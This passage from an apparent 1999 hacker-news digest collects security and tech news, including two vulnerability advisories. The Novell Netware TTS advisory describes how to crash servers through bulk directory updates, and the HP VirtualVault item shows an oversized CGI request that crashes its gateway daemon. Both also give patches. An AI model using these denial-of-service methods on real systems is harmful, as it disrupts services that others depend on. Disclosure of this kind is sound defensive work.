‘Cryptonomicon’:
Turning point
for cult author
Neal Stephenson embarks
on multi-novel epic journey
By Alan Boyle
MSNBC





May 12 The Hacker Hemingway looks the part: In his publicity photo, he strikes a cross-armed
pose in goatee, close-cropped hair and shades. But Cryptonomicon author Neal Stephenson, a
family man pushing 40 as well as a leading light in cyberpunk lit, jokes that his image could use an
overhaul. I may have to lose the goatee, he says.

ALONG WITH the comparisons to Ernest Hemingway and Thomas Pynchon, Stephenson has won praise for his
fanciful visions of not-all-that-distant technological futures. In his 1992 novel Snow Crash, he depicted a
virtual-reality realm called the Metaverse, which seemed to presage the rise of Internet culture. In 1995,
Diamond Age blended neo-tribalism with nanotechnology and an almost Big Brotherly global communications network.
All this has brought Stephenson a loyal following among computer adepts and led Newsweek to use the Hacker
Hemingway tag. His book is on Amazon.com’s top-10 list. But during a book-tour interview, Stephenson confessed that
he was sometimes uncomfortable with his hacker-cult status.
I find that the standard attitude of young people now people in high school, in college, in their 20s
is this image of hip, jaded, ultracool detachment, he said. I’ve noticed that there are a fair number of people
like that who assume I’m one of them. I’m actually not. I actually find people like that kind of annoying.

PAST AND PRESENT

Cryptonomicon may mark a turning point for Stephenson. One of the things I developed a reputation for with the
other books was speculating about future technologies, good or bad, he acknowledged. And readers who come to
‘Cryptonomicon’ looking for that kind of thing aren’t going to
get it.

Unlike the futuristic Snow Crash or Diamond Age,Stephenson’s latest work focuses on the past and a plausible
present: the battles over secret codes in World War II, modern-day deals to create data havens and, of course,
heroes who uncover a dark conspiracy that bridges the decades. It’s a cross between Raiders of the Lost Ark and
The X-Files, weighing in at 918 pages. The length isn’t the only thing imposing about Cryptonomicon: The book’s huge
cast includes historical figures such as code-breaking mathematician Alan Turing and Army Lt. Ronald Reagan. Characters
expound upon the intricacies of high-tech business plans and Cap’n Crunch cereal.

But most of all, the novel revolves around cryptography:keeping secrets and unlocking them. In fact,
Cryptonomicon boasts a how-to appendix that, by some accounts, would violate encryption export laws if it were
transmitted abroad electronically.

The appendix on the Solitaire encryption algorithm, which uses a deck of cards rather than a computer to encode
secret messages, was written by Bruce Schneier, author of Applied Cryptography. Stephenson himself is well-versed
in the mysteries of software code but doesn’t profess to be a crypto expert.

I tried to keep it real as much as I could, Stephenson said. There are places where the book deviates somewhat
from complete technical accuracy. I actually posted a little FAQ document specifically aimed at people who know about
crypto, because I know people who know crypto are going to see some things that I glossed over.

DEALING WITH CELEBRITY

Over the years, Stephenson has dealt with more than one bout with cyber-lebrity, and he says his experience is
serving him in good stead this time around. He’s avoiding broadcast interviews on this tour, since he says all of my
most horrifying experiences on the last tour were trying to explain my book on television.

He also manages to keep his public life separate from his private life. He quickly declines to discuss the effect
of cyclical fame on his family in Seattle, and he’s reluctant to talk about the grander meanings behind his writing.

If I try to stand outside of it and encapsulate my own themes, it would ruin it for me because I would be way too
self-conscious, and it would ruin it for readers, too, he said.

All in all, he sounds as if he’s anxious for the book tour’s end, so he can get back to work.

I have to have a lot of privacy, a lot of quiet, a minimum of distractions to do what I do, he said. When it’s over,
it’s really over. As soon as I finish this thing, I go into a total media blackout for years.

As fat as Cryptonomicon is, Stephenson still had to leave out some of the plot threads he was hoping to follow
and he says those tales will be told in his next novel, a sequel of sorts.

The funny thing about writing books is that the stuff that’s out where people can see it is a year or two behind the
stuff that you’re doing at the moment, he said. And if things are going right, the stuff you’re doing at the moment seems a
lot better. That’s one of the ways of trying to avoid getting a swelled head.

@HWA

44.0 Novell Netware 4.0 advisory by Nomad Mobile Research Center
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

Novell Netware 4.x Vulnerable


contributed by Simple Nomad
The Nomad Mobile Research Center has released an advisory that says that under certain conditions,
Novell Netware 4.x is vulnerable to a denial of service that can crash multiple servers. According
to Novell, the latest Service Pack will correct the problem.

The Nomad Mobile Research Center
http://www.nmrc.org/news/tts.txt

_______________________________________________________________________________

Nomad Mobile Research Centre
A D V I S O R Y
www.nmrc.org
Simple Nomad [thegnome@nmrc.org]
12May1998
_______________________________________________________________________________

Platform : Netware 4.x
Application : NDS
Severity : High


Synopsis
--------

It is possible to overflow the Transaction Tracking System (TTS) built into
Novell Netware and possibly crash multiple servers.

Tested configuration
--------------------

The testing was done with the following configuration:

Netware 4.11, Service Pack 5B

Also confirmed on Netware 4.1. All systems had 64MB RAM and 1 GB drive space.

Bug(s) report
-------------

The Transaction Tracking System (TTS) is used by Novell Netware to help
preserve the integrity of data during a system crash. If a transaction is in
the process of being written to the hard drive when the system crashes, upon
reboot the partial transaction is backed out preserving the integrity of the
original data. Administrators can optionally flag a file with the TTS flag
to add this protection (typically done with databases, especially those that
have no rollback features).

TTS by default tracks 10,000 transactions, and each instance uses a small
amount of memory. If a burst of transactions are sent to the server and the
available memory is exhausted, TTS will disable. While TTS is disabled, no
updates can be made to Netware Directory Services. This can impact any program
or process that updates NDS, such as login. In extreme overrun cases, such as
very large simultaneous (or near simultaneous, actually) transactions, memory
will be depleted quick enough to crash the server.

This is not entirely uncommon, as any large burst of traffic updating NDS
will cause the problem, such as bringing up a server after several days of
downtime that has a Directory Services replica on it. Normally this can be
corrected by increasing RAM or lowering the amount of transactions tracked
from the maximum default of 10,000 down to say 5,000 by issuing the command
SET MAXIMUM TRANSACTIONS = 5000 at the console or via ServMan, and enabling
TTS by typing ENABLE TTS at the console.

However, a malicious user with proper access can force the memory depletion
and potentially crash a server that has a replica of the NDS database. This
can lead to multiple near-simultaneous server crashes.

Of course anyone with administrative access can do this, but they could
obviously do other acts that could be just as destructive, if not more so.
What is needed is the ability to create a large number of NDS updates very
quickly. For example, if a user has the ability to create a container and
add objects to it, them that user has enough authority to potentially cause
problems to TTS. Creating a container, dropping a few hundred objects into the
container via drag-and-drop and then deleting the container should suffice.

If the server lacks a large amount of free memory, the server will quite
possibly abend. In other cases, TTS is disabled, which is a form of Denial of
Service. As the messages are sent across to other servers containing NDS
replicas, they too may crash. In our test environment we were able to crash
two servers (Netware 4.1 and Netware 4.11) with a the scenario of creating a
container, adding a few hundred users, and then deleting the container.

Solution/Workaround
-------------------

NMRC has heard reports of as many as a dozen servers crashing within a couple
of minutes of each other, so apply the latest Service Pack for Netware 4.x on
all servers or upgrade to Netware 5.

Comments
--------

Novell has already been notified and they are obviously aware of the TTS
limitations (refer to the May 1997 TID 2908153 at
http://support.novell.com/cgi-bin/search/tidfinder.cgi?2908153 for an example).
Per Novell the latest patches for Netware 4.x correct the problem, and Netware
5 does not have the problem at all.

Thanks to Michel Labelle <divebc@hotmail.com> for notifying NMRC about this
problem.

_______________________________________________________________________________


@HWA




45.0 Penalties for Pirates may increase
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

Penalties for Pirates May Increase


contributed by 1Di3h
A hearing of the House Judiciary Committee heard
testimony from the FBI , The Department of Justice, and
numerous software companies supporting proposed
legislation that would toughen the penalties for makers
and distributor of illegal copies of software.

Wired
http://www.wired.com/news/news/politics/story/19659.html

Stiffer Fines Due for Pirates?
by Heidi Kriz

3:00 a.m. 13.May.99.PDT
One out of four business software applications is pirated.

So testified Tim Starback, director of marketing for digital font maker Emigre, at a Wednesday hearing
of the House Judiciary Committee that addressed digital copyright violations. The company joined other
software publishers, as well as the FBI and the Department of Justice, in supporting proposed legislation
that would toughen the penalties for makers and distributors of illegal copies of software.

"It's time for Congress to make the pirates pay," said Ken Wasch, president of the Software & Information
Industry Association (SIAA).

Wednesday's testimony to the Subcommittee on Courts and Intellectual Property sought to advance two agenda
items.

Industry reps praised proposed amendments to the current Copyright Act, introduced yesterday by
Representative James Rogan (R-California) and Representative Howard Coble (R-North Carolina).

They also sought to hurry along implementation of the Clinton administration's 1997 No Electronic Theft
Act (NET). The latter legislation is managed by a sentencing commission, but no commissioners have been
appointed to staff it.

The proposed amendments, known as the Copyright Damages Improvement Act of 1999, seek to increase fines in
the cases of copyright violations. The current range of statutory damages, which date to 1988, vary from
US$500 to $20,000, according to Dan Duncan, vice president of government affairs for the SIIA.

Tuesday's legislative amendments propose increasing that penalty to between $750 and $30,000 -- a figure
the industry group said is based on actual damages and lost profits. In cases of willful infringement, the
new ceiling of damages would be raised from its current level of $100,000 to $150,000.

Witnesses sought to persuade Congress to clarify sentencing guidelines for criminal copyright infringements
under the NET Act.

Should the legislation pass a subcommittee vote, it will then move on to a vote in the House Judiciary
Committee, and then to a House vote.Duncan said that House members had expressed a desire to vote on the
amendments before the upcoming congressional recess, which starts after Memorial Day.

Not everyone is raving about the proposed stiffer penalties.

An MIT computer-science student who goes by the name Phat Boy said that the fines would punish those who
simply share unlicensed software over the Net as much as those who seek to sell it.

Phat Boy cited the case of "LaMacchia," a fellow MIT student who in 1994 was fingered by authorities for posting
licensed programs on the Net. Under the new rules, he would be fined hundreds of thousands of dollars, according
to Phat Boy.

"Why should that kind of act -- maybe
ill-advised, but certainly perpetrated in
the generous, shareware spirit -- be
punished with the same ferocity as a
corporate pirateer [would be]?" said Phat
Boy.


@HWA

46.0 British Spy's site shutdown on Geocities?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.403-security.org/

Spy 's site shut down
Astral 13.05.1999 12:00

The free webhosting service GeoCities has shut down a former British spy's site becuase he was threating that
he will put global illegal acts by British intelligence.The site was taken down at the end of April.What secrets were
he about to reveal.Story from ZDnet.

GeoCities Downs Spy Site

The free webhosting service GeoCities has shut down a former British spy's site. What secrets was he about to
reveal?


How far can the influence of British intelligence reach?

Today it reached half way around the world to shut down a California-based website that allegedly revealed the
identities of Her Majesty's secret agents.

Richard Tomlinson used to be an agent for the British government. Ousted in 1995, Tomlinson was then imprisoned
in 1997 for violating a British official secrets act. After his release, he reportedly ended up in Switzerland,
where he started a website claiming global illegal acts by British intelligence.

The site was taken down at the end of April; Swiss authorities say Tomlinson had threatened to publish British
secrets online, and they had to shut him down to prevent that.

Last week, Tomlinson put up a new site through the free Web-hosting service GeoCities. This time, he allegedly
said he was going to release sensitive details about where British intelligence offices are located. That new
site has now been suspended.

Bruce Zanca, the vice president of communications at GeoCities, says that it was simply a matter of policy.
"People [complete] a questionnaire and agree to no illegal activities and no hate speech. It was brought to our
attention that there were content violations; we put the site under suspension."

He added, "We're careful in protecting privacy for our users, so I can't get into details, but it fell under
the general content restrictions."

Next steps? "[Tomlinson] is free to [dispute the shut down] and if so, we'll start a dialog with him. If the
site is brought into compliance, we'll put the website back up."

Sunday Times; (UK)


May 13 1999
BRITAIN




Government fears that rogue website might put lives at risk,
writes Michael Evans

MI6 agent list published on the Internet URGENT legal moves were ordered yesterday after an
American website published the names of a "large number" of serving MI6 intelligence officers.

Ministry of Defence officials learnt of the new Internet website yesterday morning and immediately
contacted Rear Admiral David Pulvercraft, Secretary of the Defence, Press and Broadcasting Advisory
Committee - the D Notice Committee - to try to prevent publication of any of the names by the British
media.

The list of MI6 names and other details about the intelligence service were regarded as a serious security
breach.

Admiral Pulvercraft, who has no powers to stop newspapers publishing sensitive material, advised that
publication of such details could "put lives at risk". He said that there was concern that the "long list"
may have been put on the Internet by a former member of the Secret Intelligence Service.

Last week the Government took out a court injunction in Switzerland against Richard Tomlinson, the former MI6
officer who was sacked from the service and was subsequently sentenced to 12 months in prison for
breaching the Official Secrets Act.

The injunction prevented Mr Tomlinson, who now lives in Geneva, from disclosing any information about his past
employment by MI6. The injunction covered disclosure anywhere in the world and included information put on the
Internet.

The American website makes no mention of Mr Tomlinson, and there is no evidence that he set it up himself.

However, it was clear to Government lawyers that information on the website had come from Mr Tomlinson.
The website refers to a disaffected MI6 officer.

John Wadham, his lawyer, said that he had threatened to put such information on the Internet.

He said Mr Tomlinson felt he had been "harassed around the world", and this was why he may have decided to take
such action.

Mr Tomlinson has also indicated that he still hoped to publish a book. It was his attempt to sell his MI6 memoirs
to an Australian publisher that led to his arrest and trial at the Old Bailey. He pleaded guilty to breaching the Official
Secrets Act and was released from jail in April last year.

Although the Chief of the Secret Intelligence Service, known as

  
"C", currently Richard Dearlove, is formally
named by the Government on his appointment, no other members of the service are ever officially identified.

Under Defence Advisory Notice No 6, editors of newspapers are asked to seek advice from the D Notice
Secretary before publishing such details "unless they have been widely disclosed or discussed".

Admiral Pulvercraft made clear yesterday that the identities of so many MI6 officers had not been previously disclosed,
and he asked that the address of the website should not be published.

Steps were being taken to see how the damage arising from the disclosure of the MI6 names could be minimised.

Admiral Pulvercraft had to decide whether to make an issue of the case, knowing that by doing so he was drawing
attention to the fact that a website had been set up.

He said yesterday that even if the website was only short-lived, he felt it was necessary to put out an advisory
notice.




@HWA

47.0 The Virus Hype, Fact or Fiction by Thejian
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/

THE VIRUS HYPE: FACT OR FICTION?
by BHZ, Thursday 13th May 1999 on 9:48 pm CET
Viruses are common threats to all computer users. From exe infectors to new-age
Macro viruses. Our new special report goes deeper into viruses. You could read about
"White Hats" and "Black Hats", media hype, myths and of course sollutions. So if
you are interested read new Special Report.

The Virus-hype: Fact or fiction?

By now we've probably all heard of the term "computer virus". After all the
panic first caused by Melissa and followed up by the CIH 1.2 Chernobyl-virus
the mainstream computer-users now know (if they didn't know that already)
one of the threats of the "Information Age" by name. It's nice that we all can
copy and download programs and files from the internet and from each others system,
but there are certain safety risks involved here. They have always been there
btw, we just needed a little push to get the media coverage going. But how bad
is it really? Every major online news service (and a lot of their printed
collegues too) have reported about the menace the computer virus presents and
they did a good job scaring the crap out of the clueless regular computer users,
but how much of these stories is really true? And what is yet to come?

Let's get something straight first: the first goal of most newspapers and online
news services IS profit. They just need to sell. As do the Antivirus developers.
This was demonstrated nicely in December last year, when the Remote Explorer-virus
hit the network of MCI Worldcom. Eventually it was proven to be an attempt for vengeance
by one of the company's ex-employees. But by then the media-machine of AV-developer
Network Associates had sadly labeled this virus, that spread through the Win NT
networks of the company encrypting and resizing data files, as one of the worst
viruses ever. This turned into just another marketing trick, in the hope to
sell their fix which was miraculously discovered only a week after NA and the media
had convinced the public that this was the big one.
It's sad to see how some companies can put their name out to dry just to gain some
more profit, but it's even sadder to see how easily the some journalists take over
such a story to sell a few more papers or a little more advertising.

Viruses just scare the crap out of the regular user because he doesn't know much on the
subject.

Let's look at where viruses come from for example. The main opinion on virus-writers
and the virii-scene (VX) is almost one of hate. "Those rotten low-life computer-geeks
who are only out for one thing: complete and utter destruction of ones data!"

This view just shows how misinformed some people are. Of course there are some people
out there who are really devoted to destruction, but they're to be found in every
field. The effect some viruses have combined with the feeling of helplessness the
average Joe feels when infected by one is one of the primary causes of this. The
press can be named as another, but probably one of the biggest enemies here is the
lack of knowledge on the matter. Don't get me wrong, I don't condone virus-writing
in any way, I just don't condemn it either. One huge point is forgotten by people
who discuss this topic like the sky is going to fall down. Computer viruses may cause
damage but they have brought on immense technological development.
I'd rather have some "bad guys" and also a lot of "good guys" who
research and cooperate with each other on this field and in this way help developing
methods to protect my pc then that the scene goes completely underground, leaving the
AV-researchers only with the opportunity to research a virus when it starts spreading.
Think about it. I don't want to come 'round quoting Confucius to y'all, but a doctor
that cures when an illness starts to spread will of course get more fame then one that
prevents the illness at the first signs. But which one would you prefer to be treated by?
The one that let's you get sick first or the one that cures you at the first detection?

The virus writers' community is split (like the general hacking community) into two camps.
They refer to themselves as "Black Hats" and "White Hats". The "Black Hats" are mostly
interested in doing damage and sometimes release viruses through e-mail or Usenet
newsgroups. Though there are have been a lot of discussions on this subject, virus
writing (leaving out the macro viruses here) requires a great amount of skill. A lot of
the people who develop and research viruses could be called "hackers" instead of
"vandalists", for what they do is aimed at technological progress and has certainly
not always to do with destruction of data. This is proven by the fact that the majority
of computer viruses never make it "into the wild". They reside only in virus libraries
kept by writers and researchers.

The claim that there are thousands of viruses around nowadays is, when you look at the
above, just not accurate either. People who make these claims almost certainly work for
the AV-companies or simply don't know what they're talking about. AV-companies count even
the most insignificant variations of known viruses as new ones for advertising purposes.
Most viruses are just variations on the same virus, sometimes even only differing one
symbol in it's code or message (instead of "legalize" a variation of the good old
Marijuana-virus later contained the word "legalize", is this a new virus???).

In general AV-software is able to detect such variations on it's own nowadays and the
few really new ones are quickly added to upgrades which every user can simply download
from the manufacturers site. Sure, you can never detect all of them in time and
sometimes data is lost, but virus scanners could detect CIH 1.2 even before it struck
on the 26th of April and these technologies are still advancing rapidly.

Another myth is the one that you can only get viruses by downloading from BBS's and
the Internet. In fact, this is one of the least common ways of infection. Most sites
nowadays use strict policies to make sure you won't get infected through anything
you've downloaded there. It can happen sometimes of course, but I've never heard one
of my friends complaining about this. A big chunk of the online infection-problem lies
within e-mail, which spreads mostly macro-viruses.
One of the main sources of viruses nowadays is the demand for more functions in
our software, like the Corel or Microsoft Office scripting languages.
WordBasic is a nice example of this. This microprogramming language which is part of
the Microsoft Office-package allows an user to add new functions (in the form of macro's)
to their copies of Word, Access or Excel. Problem is that only a select group of users
knows how to uses this. Among them are the macro virus writers. The Melissa-macro virus is
a nice recent example of this. Is it really necessary to have a zillion more functions
if this opens up just as many new manners to attack ones data?
Also one of the main problem lies besides downloading and employees holding a grudge the
with the retail packages themselves. Besides some bugs and copy-protections gone bad, a
lot of viruses are spread directly from the companies that might seem to be victims. For
example, IBM recently recalled a shipment of Aptivas which were infected with the
CIH-virus.

Due to monopolizing of certain lines of software using the above mentioned scripting-
languages, the problem cause by this spreads. Also with the development of new
functions and technologies within vulnerable packages, even more new sources for virii
come in existence every day. "So the next generation viruses will be even more
destructive?"
, you might ask. I think the last two months have shown that. First we
had the Melissa-virus. All major companies shut down their networks to keep from being
infected and once again all AV-developers and journalists jumped on the virus-subject.
Only to have the "plague" called Melissa overshadowed by a new one called CIH 1.2 a
couple of weeks later. Where Melissa (and her variations) just caused a lot of extra
email-traffic, CIH 1.2 attacked the (flash) BIOS and the HD's themselves. After his
arrest (and release) the creator of the virus even told the press about two more
destructive viruses he was working on! If you combine this with the Chaos Virus Theory,
which predicts the advancement of future virus generations to intelligent, thinking and
self-evolving viruses, question arises how we can ever prevail against these evil
menaces?

At the danger of sounding like I'm downplaying or underestimating the problem, I think
we shouldn't panic to much on the subject though. Like I mentioned before, AV-research
makes a lot of progress. This is mainly because of the cooperation between AV-companies
and the virus-creators. If you start a manhunt on the latter, the first well be left
empty-handed. The only way we will notice the new discoveries in this field then is by
the time they've infected half the Internet. Of course we should be aware of certain
elements in this scene, the ones insisting on inflicting damage and aiming for "Internet-
anarchy"
. You can't judge a group of people by a (relatively small) segment of that
group. Now the FBI is shutting down virii-sites like Codebreakers. While from one
point of view this is necessary and only a logical step. While I agree that steps
should be taken to prevent the kiddies from downloading virus-sources to impress their
friend and in this way (intended or not) spread another infection, we shouldn't forget
the fact that the only way to keep up and be able to actively and effectively combat
this menace is by working together. We should beware not to force the "underground" to
really go underground. Viruses present a very real threat, but don't get sucked into
the hype. For all our sakes.

Thejian
Help Net Security
http://net-security.org

48.0 The Internet Fraud Council
~~~~~~~~~~~~~~~~~~~~~~~~~~

THE INTERNET FRAUD COUNCIL
by BHZ, Thursday 13th May 1999 on 4:23 pm CET
Computer frauds cost the industry billions of dollars. Finally US authorities created
The Internet Fraud Council - coalition of few companies that fight computer crime.
They said that they will give their "Seal of approval" to companies that are fraud-free.
Officials at the electronic crime center also announced yesterday a new FBI Internet
Fraud Complaint Center, which will collect complaints from across the country. Read
whole article on CNET

Council formed to fight Net fraud
By Reuters
Special to CNET News.com
May 11, 1999, 8:55 a.m. PT

ORLANDO, Florida--With fraud on the Internet shaping up as the multibillion-dollar crime of the
1990s, U.S. authorities and antifraud groups yesterday launched fresh initiatives to combat Net
crime.

The Internet Fraud Council, a coalition of antifraud companies, said it will create a set of
standards for companies doing business on the Internet, a clearinghouse of information on online
crime, and a fraud-free "seal of approval" for such businesses operating in cyberspace.

"It's hard for law enforcement to keep up," John Hiatt, president of the National Coalition for the
Prevention of Economic Crime, said at a news conference during a meeting on economic crime.

"The bandits change hardware and software every six months. In law enforcement, that number is 48
months,"
he said.

Paul Fichtman, chairman of the Internet Fraud Council, said estimates of the cost of Internet fraud
ranged from $9 billion to $108 Billion in 1998.

"Clearly, there's no way anyone can estimate the amount of fraud on the Internet," he said.

The Internet Fraud Council also said it would create a clearinghouse for information about online fraud.

Most Internet crime involves the theft of identifying information, such as credit card or social security
numbers from individual consumers. But thieves also steal corporate identities, posing as news services or
financial analysts in order to float false reports that can send a stock soaring or plummeting.

In April, an Internet posting of a false financial news story sent shares of PairGain Technologies, a small
California company, soaring 31 percent, only to fall back to earth when the story proved false.

"The Internet is quickly becoming a primary communications and e-commerce tool," said Norman Willox, chief
executive of the National Fraud Center, a white-collar antifraud firm and one of the partners in the Internet
Fraud Council. "Fraud on the Internet is increasing exponentially. Existing efforts [to fight it] have been
so specialized or fragmented that they have been ineffective."


Officials at the electronic crime center also announced yesterday a new FBI Internet Fraud Complaint Center,
which will collect complaints from across the country.

Willox said he expects the two centers to work together closely.

"Right now there's no tool that measures the loss from economic crime on the Internet," he said. "It doesn't
matter which organization is first to the scene of the crime as long as they share information."


"What we want to do is give people tools that make it too expensive for these guys to be fraudulent," Fichtman
said. "If we can do that, they'll leave the Internet and go somewhere else."

@HWA

49.0 Credit Card fraud under watchful eyes of eFalcon 'electronic brain'
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


EFALCON PREYS ON CREDIT FRAUD (BUS. 3:00 am)
http://www.wired.com/news/news/email/explode-infobeat/business/story/19662.html


It's an open secret that the Web is still the Wild West for
credit-card crooks. HNC Software hopes its new anti-fraud
software, eFalcon, will change that. By Craig Bicknell.

EFalcon Preys on Credit Fraud
by Craig Bicknell

3:00 a.m. 13.May.99.PDT
You may not know it, but the last time you used your credit card to buy a sporty
new shirt at the mall, you probably had to get the nod from a big brain named
Falcon.

A big electronic brain, that is. For the last six years, Falcon, software based on
neural networks, has been analyzing the purchasing patterns of more than 260
million credit cards. Over time, it has learned to spot the telltale signs of fraud.

Before most credit-card processors authorize a charge, they first get Falcon's
OK.

HNC Software, the creator of Falcon, hopes that online merchants will soon
start doing the same. This week, the company launched eFalcon, a form of
Falcon tweaked to detect the credit fraud that's so rampant online.


See also: Credit Card Fraud Bedevils Web


"Fraudulent transactions may exceed 10 percent of e-commerce merchant
revenues.... That's a huge problem,"
said HNC chief Robert North. In comparison,
fraudulent sales account for less than 1 percent of traditional retail revenues.

Credit-card company rules mandate that Web merchants, not consumers, pick up
the tab for bogus charges, plus a US$25 fee. It's a big strain for a fledging
e-commerce company.

EFalcon will help merchants spot potentially fraudulent transactions in a
couple of different ways. When a user enters a credit-card number on a Web
site, the number and information about the proposed purchase are zipped off to
the Falcon database. There, the data will be assessed against the purchase history
on the card and scored for likelihood of fraud.

EFalcon bases the score on hundreds of factors, including the amount of
purchase, the type of merchandise and store, the time since last purchase, and
the location of the surfer's computer. If eFalcon has never seen the card before,
it will generate a score based on the average buying patterns of all
cardholders.

The higher the score, the more likely the purchase is fraudulent. Merchants decide
what the cutoff score will be for accepting a transaction.

EFalcon will also take into account the way a surfer moves around the
merchant's site. For example, a bona fide shopper is likely to linger before making a
purchase, while a crook heads straight for the Buy button.

Analysts who've taken a look at eFalcon are impressed. "I think it's going to be a
big success,"
said Avivah Litan, research director for payment systems at Gartner
Group. "They've got a lot of experience dealing with fraud in the physical world."

That is also its limitation, said William Donahoo, vice president of marketing at
CyberSource, a competing firm that also makes fraud detection software for the
Web. Unlike HNC, CyberSource has been making anti-fraud software for the Web
exclusively, since the earliest days of e-commerce.

"The difference between the online world and the brick-and-mortar world is night
and day,"
said Donahoo. "We're a fraud system built by the Internet and for the
Internet."


Still, he's glad to see HNC entering the market. "It's a validation that they, too,
see the need for risk-management services online. Fraud will only become a
bigger and bigger issue as more shoppers come onto the Web."


@HWA

50.0 [ISN] A ban on unauthorized computer access in Japan to be enacted
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From the ISN mailing list

Forwarded From: "Prosser, Mike" <mike.prosser@L-3Security.com>

May 13, 1999 (TOKYO) -- Legislation to outlaw unauthorized access to
computer networks will go into effect in Japan by the end of this year at
the earliest, and the penalties will include fines or imprisonment.

The bill, sponsored jointly by the National Police Agency, the Ministry
of Posts and Telecommunications, and the Ministry of International Trade
and Industry (MITI), was submitted to the Diet after it was adopted at a
Cabinet meeting on April 16. It is expected to pass the Diet by the end
of June.
The concerned government agencies will make the bill to ban
unauthorized access a new law, and not simply an amendment to the Criminal
Law or the Telecommunications Business Law. Under the terms of the
legislation, unauthorized access is defined as "any unauthorized logging
in to a computer network using another person's ID or password, or any
attack on a security hole in an operating system or application."
The bill
will ban such unauthorized access. The penalties will include imprisonment
for up to one year or fines of up to 500,000 yen. (121.03 yen = US$1)
Also, the bill will outlaw "any acts to promote unauthorized access"
such as provision or sales of a user ID and password to a third party. In
such cases, penalties will be fines of up to 300,000 yen. Even in the
United States and Europe, where laws banning unauthorized access have
already been enacted, few countries ban acts to promote unauthorized
access.
The bill will protect "all networked computers, those which control
access with a user authentication via a user ID or password as well as
authentication results"
from unauthorized access. Networks will include
the Internet, public circuits and corporate dedicated lines.
The new bill will not require corporate system administrators to
"preserve log on records of protected computers," which the NPA has
sought. Preservation of logs was excluded from the bill based on
discussions among the three concerned parties.
In November 1998, the NPA sought to require companies to preserve their
log records, based on its view that "those to be protected by the bill and
obliged parties are identical."
However, many companies said that such a
requirement would impose a tremendous burden on them and that it wouldn't
necessarily help prevent unauthorized access.
Nonetheless, companies will still be expected to make their best
efforts to preserve log records to detect any unauthorized access at an
early stage and minimize damages. The bill will not have its intended
effect unless companies take some measures to prevent unauthorized access.
Therefore, the three parties decided to ask companies to implement
voluntary efforts to take some measures to prevent unauthorized access.
Specifically, system administrators are expected to manage passwords on a
thorough basis, and to implement a variety of preventive measures.
Although it is not legally binding, most system administrators will
likely implement such preventive measures on a voluntary basis.


-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: Hacker News Network [www.hackernews.com]

@HWA

51.0 Virtual Vault Vulnerable
~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

Virtual Vault Vulnerable


contributed by John Daniele
John Daniele has released a report that details a trivial
DoS attack on HP's Virtual Vault operating system.
Virtual Vault is a is a B1 and B2 DoD compliant system
that is very popular with banks and e-commerce
systems. HP claims to have addressed this problem in
patch PHSS 10747 however numerous sites remain
vulnerable.


TGAD DoS
http://www.faber.to/foo/vvos.htm

VirtualVault Overview

The VirtualVault operating system is HP's solution to secure
electronic commerce. It is a B1 and B2 DoD compliant system
that is becoming increasingly popular with big business, banks, etc.,
The main security mechanism in which VVOS is based upon is data partitioning.
Data on the system is classified into one of four security classes, or 'vaults' --
INSIDE, OUTSIDE, SYSTEM and SYSTEM HIGH. The INSIDE vault houses the server's
backend applications and databases. The OUTSIDE vault generally
contains the internet front end and any necessary CGI binaries, etc.
SYSTEM and SYSTEM HIGH are responsible for maintaining the external
webpages and audit logs respectively. These vaults are totally segregated
from each other and work essentially as separate machines. If a
program requires access to either of the vaults it must be authenticated
by HP's Trusted Gateway Proxy daemon. The TGP daemon filters all requests
from the internet and forwards them to middleware server packages that
safely reside behind the INSIDE vault.

TGA Bug

While the TGP daemon does a good job of ensuring the integrity of the
request prior to forwarding data to its destination, the trusted
gateway agent that is responsible for wrapping CGI requests does not
check the length of the request prior to sending it to TGP. This poses
a problem since TGA does not correctly handle request messages that
are more than 512 bytes in length. The result is a trivial DoS attack on
TGA and all services being wrapped by TGA. The bug was discovered during a
penetration test on a client system running VVOS 3.01. A post was made to
a CGI application residing on the system with a large string of characters.
This was then sent to the trusted gateway agent, causing the daemon
to crash, leaving the Netscape Enterprise Server unable to service further
HTTP/SSL requests. The NES logs show the following:

[07/May/1999:16:16:22] security: for host xxx.xxx.xxx.xxx trying to
GET /cgi-bin/somecgi.cgi?AAAAAAAAAAAAAAA..., vvtga_log reports: ERROR: setup_connection():
Failed to transfer execution message to TGA daemon

And when NES is started back up:

[07/May/1999:16:28:18] info: successful server startup
[07/May/1999:16:28:18] info: Netscape-Enterprise/3.5.1G B98.169.2301
[07/May/1999:16:33:18] failure: Error accepting connection -5993 (Resource temporarily unavailable)

FIX

Chris Hudel of HP was notified of this bug on Wednesday May 12, 1999. He stated
that HP was aware of the problem and addressed it in patch PHSS 10747. However, I am not
aware of HP releasing an official 'bug report' on this issue.
Since I have encountered several VVOS systems this past week that have not
been patched, and sysadmins unaware of this bug and patch, I decided to post the
details publicly. NOTE: I have not tested this bug against PHSS 10747 and would
appreciate input from those who have at foo@faber.to.

- John Daniele
jdaniele@kpmg.ca


@HWA


52.0 GaLaDRiel PoC (Proof of concept) Corel virus resurfaces in the wild
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Corel Scripts Infected by New Virus

From HNN http://www.hackernews.com/

contributed by tetricycle
The the GaLaDRiel (or C.S.Gala) virus infects the script
language used by Corel products. This particular version
is not malicious and only displays a text message. The
message is only displayed on June 6 and contains seven
lines from J.R.R. Tolkien's The Lord of the Rings.

PC World
http://www.pcworld.com/pcwtoday/article/0,1510,10954,00.html


Virus Infects Corel Scripts

Virus is low risk, not easily spread, and causes minor damage.

by Stan Miastkowski, special to PC World
May 13, 1999, 6:38 p.m. PT

A new wrinkle in computer viruses appeared this week with the discovery of a virus that infects the script
language used by Corel products. But experts say the GaLaDRiel (or C.S.Gala) virus will affect few users, and
is not destructive.

The virus is not contained in the company's applications, according to a Corel representative. You
